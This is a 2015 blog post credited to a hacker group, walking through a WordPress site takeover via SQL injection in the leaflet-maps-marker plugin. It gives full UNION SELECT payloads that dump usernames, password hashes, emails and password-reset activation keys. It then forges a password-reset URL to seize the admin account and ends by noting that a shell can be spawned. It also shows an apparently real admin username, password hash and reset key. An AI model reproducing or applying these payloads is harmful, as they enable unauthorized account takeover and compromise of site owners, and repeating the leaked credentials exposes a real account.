Wednesday, May 6, 2015

A new way to inject site that use Wordpress Script

This thread come to you by ☆¸.•*☆ :: Gaza Hacker Team [ GHT ] and [ GHI ] :: ☆*•.¸☆

Today I'll show you How to inject site - word press - And enter to admin panel in Seconds .

lets say we have this vuln site :




PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 
and let's say We extracted column number and admin data [ user and passwors ] by sqli 


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_userswhere (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --  

admin logo : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0

now this password is difficult to crack it

ok now i will show you Easy way to login into the admin panel

first we going to admin panel and press / Lost your password? \



PHP Code:

www.site.com/wp-login.php 

Wordpress exploit
























now we will put the admin user we found by injectin : michelsenweb .


Wordpress exploit






















like this

Wordpress exploit























now we haven't the admin mail to receive a link to create a new password 
or to get the activation key .

OK see what i will do !!!

now we will extracted user_activation_key by injection that we will use to grate new password


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users










now we have the user_activation_key to this admin user : michelsenweb

michelsenweb:ADpMtuhLWYbPSubvKwgx

now we will use this Query to grate new password

PHP Code:

www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login 

replace : user_activation_key by ADpMtuhLWYbPSubvKwgxreplace : user_login by michelsenweb .

like this

PHP Code:
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb 

wordpress exploit























now we get this page to grate now password after we Makes 
now password press Reset password

wordpress exploit















ok let's try to log into admin panel by our new password

wordpress expoilt























aha we now in admin panel and now we can spawned shell

wordpress exploit






















hope you learned something:::

Author :: 
Gaza Hacker Team

No comments:

Post a Comment